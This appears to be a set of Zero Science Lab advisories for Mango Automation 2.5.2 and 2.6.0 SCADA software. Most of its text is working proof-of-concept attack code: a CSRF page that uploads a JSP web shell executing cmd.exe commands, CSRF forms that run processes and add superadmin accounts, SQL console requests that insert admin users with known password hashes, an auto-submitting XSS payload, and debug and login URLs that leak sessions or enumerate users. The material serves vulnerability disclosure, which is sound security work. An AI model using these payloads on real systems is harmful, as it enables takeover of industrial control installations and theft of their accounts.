1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361 | Mango Automation 2.6.0 CSRF File Upload And Arbitrary JSP Code Execution
Vendor: Infinite Automation Systems Inc.
Product web page: http://www.infiniteautomation.com/
Affected version: 2.5.2 and 2.6.0 beta (build 327)
Summary: Mango Automation is a flexible SCADA, HMI And Automation software application that allows you
to view, log, graph, animate, alarm, and report on data from sensors, equipment, PLCs, databases, webpages,
etc. It is easy, affordable, and open source.
Desc: Mango suffers from an authenticated arbitrary JSP code execution. The vulnerability is caused due
to the improper verification of uploaded image files in 'graphicalViewsBackgroundUpload' script via the
'backgroundImage' POST parameter which allows of arbitrary files being uploaded in '/modules/graphicalViews/web/graphicalViewUploads/'.
This can be exploited to execute arbitrary JSP code by uploading a malicious JSP script file that will be
stored as a sequence number depending on how many files were uploaded (1.jsp or 2.jsp or 3.jsp .. n.jsp).
Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
Jetty(9.2.2.v20140723)
Java(TM) SE Runtime Environment (build 1.8.0_51-b16)
Java HotSpot(TM) Client VM (build 25.51-b03, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5262
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5262.php
20.08.2015
--
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:8080/graphicalViewsBackgroundUpload", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryb8cxmjBwpzDcHUVI");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryb8cxmjBwpzDcHUVI\r\n" +
"Content-Disposition: form-data; name=\"backgroundImage\"; filename=\"cmd.jsp\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c%@ page import=\"java.util.*,java.io.*,java.net.*\"%\x3e\r\n" +
"\x3cHTML\x3e\x3cBODY\x3e\r\n" +
"\x3cFORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\"\x3e\r\n" +
"\x3cINPUT TYPE=\"text\" NAME=\"cmd\"\x3e\r\n" +
"\x3cINPUT TYPE=\"submit\" VALUE=\"Send\"\x3e\r\n" +
"\x3c/FORM\x3e\r\n" +
"\x3cpre\x3e\r\n" +
"\x3c%\r\n" +
"if (request.getParameter(\"cmd\") != null) {\r\n" +
" out.println(\"Command: \" + request.getParameter(\"cmd\") + \"\\n\x3cBR\x3e\");\r\n" +
" Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParameter(\"cmd\"));\r\n" +
" OutputStream os = p.getOutputStream();\r\n" +
" InputStream in = p.getInputStream();\r\n" +
" DataInputStream dis = new DataInputStream(in);\r\n" +
" String disr = dis.readLine();\r\n" +
" while ( disr != null ) {\r\n" +
" out.println(disr); disr = dis.readLine(); }\r\n" +
" }\r\n" +
"%\x3e\r\n" +
"\x3c/pre\x3e\r\n" +
"\x3c/BODY\x3e\x3c/HTML\x3e\r\n" +
"------WebKitFormBoundaryb8cxmjBwpzDcHUVI--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Webshell: http://localhost:8080/modules/graphicalViews/web/graphicalViewUploads/17.jsp
#################################################################
Mango Automation 2.6.0 CSRF Arbitrary Command Execution Exploit
Advisory ID: ZSL-2015-5261
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5261.php
20.08.2015
--
<html>
<body>
<form action="http://localhost:8080/dwr/call/plaincall/EventHandlersDwr.testProcessCommand.dwr" method="POST">
<input type="hidden" name="callCount" value="1" />
<input type="hidden" name="page" value="/event_handlers.shtm" />
<input type="hidden" name="httpSessionId" value=" " />
<input type="hidden" name="scriptSessionId" value="26D579040C1C11D2E21D1E5F321094E5866" />
<input type="hidden" name="c0-scriptName" value="EventHandlersDwr" />
<input type="hidden" name="c0-methodName" value="testProcessCommand" />
<input type="hidden" name="c0-id" value="0" />
<input type="hidden" name="c0-param0" value="string:C:\\windows\\system32\\calc.exe" />
<input type="hidden" name="c0-param1" value="string:15" />
<input type="hidden" name="batchId" value="24" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#################################################################
Mango Automation 2.6.0 Unprotected Debug Log View Vulnerability
Advisory ID: ZSL-2015-5260
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5260.php
20.08.2015
--
One scenario is where the attacker visits the following URL and takes over the admin session (given that the administrator didn't manually disabled the debugging and has produced some exception in current session):
- http://localhost:8080/status/
Other scenario is where the attacker sends a link to the victim so the victim after clicking on the link, generates exception and writes all his session attributes in the status page:
- http://localhost/status/mango.json?time=$
- http://localhost/status/
Sample status output:
\"$\"\r\n\r\n\r\nSESSION ATTRIBUTES\r\n sessionUser=User [id=6, username=n00b, password=NWoZK3kTsExUV00Ywo1G5jlUKKs=, email=z@s.l, phone=123321, admin=true, disabled=false, dataSourcePermissions=[], dataPointPermissions=[], homeUrl=, lastLogin=1440142956496, receiveAlarmEmails=0, receiveOwnAuditEvents=false, timezone=]\r\n LONG_POLL_DATA_TIMEOUT=1440143583487\r\n LONG_POLL_DATA=[com.serotonin.m2m2.web.dwr.longPoll.LongPollData@839308, com.serotonin.m2m2.web.dwr.longPoll.LongPollData@1b4dafa]\r\n\r\n\r\nCONTEXT ATTRIBUTES\r\n DwrContainer=org.directwebremoting.impl.DefaultContainer@138158\r\n constants.EventType.EventTypeNames.AUDIT=AUDIT\r\n constants.SystemEventType.TYPE_USER_LOGIN=USER_LOGIN\r\n constants.Permissions.DataPointAccessTypes.READ=1\r\n org.directwebremoting.ContainerList=[org.directwebremoting.impl.DefaultContainer@138158]\r\n constants.DataTypes.BINARY=1\r\n constants.UserComment.TYPE_EVENT=1\r\n constants.SystemEventType.TYPE_SYSTEM_STARTUP=SYSTEM_STARTUP\r\n javax.servlet.ServletConfig=org.eclipse.jetty.servlet.ServletHolder$Config@bc620e\r\n
Also you can list all of the Classes known to DWR:
- http://localhost:8080/dwr/index.html
#################################################################
Mango Automation 2.6.0 CSRF Arbitrary SQL Query Execution
Advisory ID: ZSL-2015-5259
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5259.php
20.08.2015
--
SQL query in version 2.5.2 (pass 123123) with hash injection:
-------------------------------------------------------------
INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','Y','N',1440075860103,'','0','N','','Y');
1 records(s) updated.
SQL query in version 2.6.0 beta build 327 (pass 123123) with hash injection:
----------------------------------------------------------------------------
INSERT INTO USERS VALUES(1337,'gjoko','YB8YiWZ++uuzO4wSVyg12j8Cf3g=','gjoko@z.sl','','N',1440075860103,'','0','N','','Y','superadmin');
1 records(s) updated.
USERS table:
ID USERNAME PASSWORD EMAIL PHONE DISABLED LASTLOGIN HOMEURL RECEIVEALARMEMAILS RECEIVEOWNAUDITEVENTS TIMEZONE MUTED PERMISSIONS
1.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 51
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=select+*+from+users%3B&query=Submit+query
2.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 54
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=select+*+from+users%3B&tables=Get+table+list
3.
POST /sqlConsole.shtm HTTP/1.1
Host: localhost:8080
Content-Length: 246
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/sqlConsole.shtm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=13208s4v50p7duy7hjzmxetz1
sqlString=INSERT+INTO+USERS+VALUES%289%2C%27gjoko3%27%2C%27YB8YiWZ%2B%2BuuzO4wSVyg12j8Cf3g%3D%27%2C%27gjoko%40z.sl%27%2C%27333222111%27%2C%27Y%27%2C%27N%27%2C1440075860103%2C%27%27%2C%270%27%2C%27N%27%2C%27%27%2C%27Y%27%29%3B&update=Submit+update
#################################################################
Mango Automation 2.6.0 CSRF Add Admin Exploit
Advisory ID: ZSL-2015-5258
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5258.php
20.08.2015
--
2.5.2:
<!-- user hacker, pass 123123 -->
<html>
<body>
<form action="http://localhost:8080/dwr/call/plaincall/UsersDwr.saveUserAdmin.dwr" method="POST" enctype="text/plain">
<input type="hidden" name="callCount" value="1 page=/users.shtm httpSessionId= scriptSessionId=8BD64066486071219EB8691611D48F14109 c0-scriptName=UsersDwr c0-methodName=saveUserAdmin c0-id=0 c0-param0=number:-1 c0-param1=string:hacker c0-param2=string:123123 c0-param3=string:hacker%40hacker.hack c0-param4=string:111222333 c0-param5=boolean:true c0-param6=boolean:false c0-param7=string:0 c0-param8=boolean:false c0-param9=string: c0-param10=Array:[] c0-param11=Array:[] batchId=5 " />
<input type="submit" value="Submit request 1" />
</form>
</body>
</html>
2.6.0 beta (build 327):
<!-- user hacker3, pass admin (in sha1(base64) hash value) -->
<html>
<body>
<form action="http://localhost:8080/rest/v1/users.json" method="POST" enctype="text/plain">
<input type="hidden" name="{"username":"hacker3","password":"0DPiKuNIrrVmD8IUCuw1hQxNqZc" value="","email":"hacker@zeroscience.mk","phone":"111222333","muted":true,"disabled":false,"homeUrl":"http://www.zeroscience.mk","receiveAlarmEmails":"NONE","receiveOwnAuditEvents":false,"timezone":"","permissions":"user,superadmin"}" />
<input type="submit" value="Submit request 2" />
</form>
</body>
</html>
#################################################################
Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability
Advisory ID: ZSL-2015-5257
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5257.php
20.08.2015
--
<html>
<head>
<title>Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability</title>
</head>
<body>
<form name="login" method="post" action="http://localhost:8080/login.htm">
<input type="hidden" name="username" value='"><script>alert("XSS");</script>' />
<input type="hidden" name="password" value="blah" />
</form>
<script type="text/javascript">
document.login.submit();
</script>
</body>
</html>
#################################################################
Mango Automation 2.6.0 User Enumeration Weakness
Advisory ID: ZSL-2015-5256
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5256.php
20.08.2015
--
Request for non-existent username:
----------------------------------
POST /login.htm HTTP/1.1
Host: localhost:8080
Content-Length: 29
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/login.htm;jsessionid=6zpfpnxljyzf13l3zrpx9e0xd
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd
username=noob&password=123123
Response:
- <td class="formError">User id not found</td>
Request for existent username:
------------------------------
POST /login.htm HTTP/1.1
Host: localhost:8080
Content-Length: 32
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8080/login.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: MANGO8080=6zpfpnxljyzf13l3zrpx9e0xd
username=admin&password=123123
Response:
- <td colspan="3" class="formError">Invalid login<br/>
|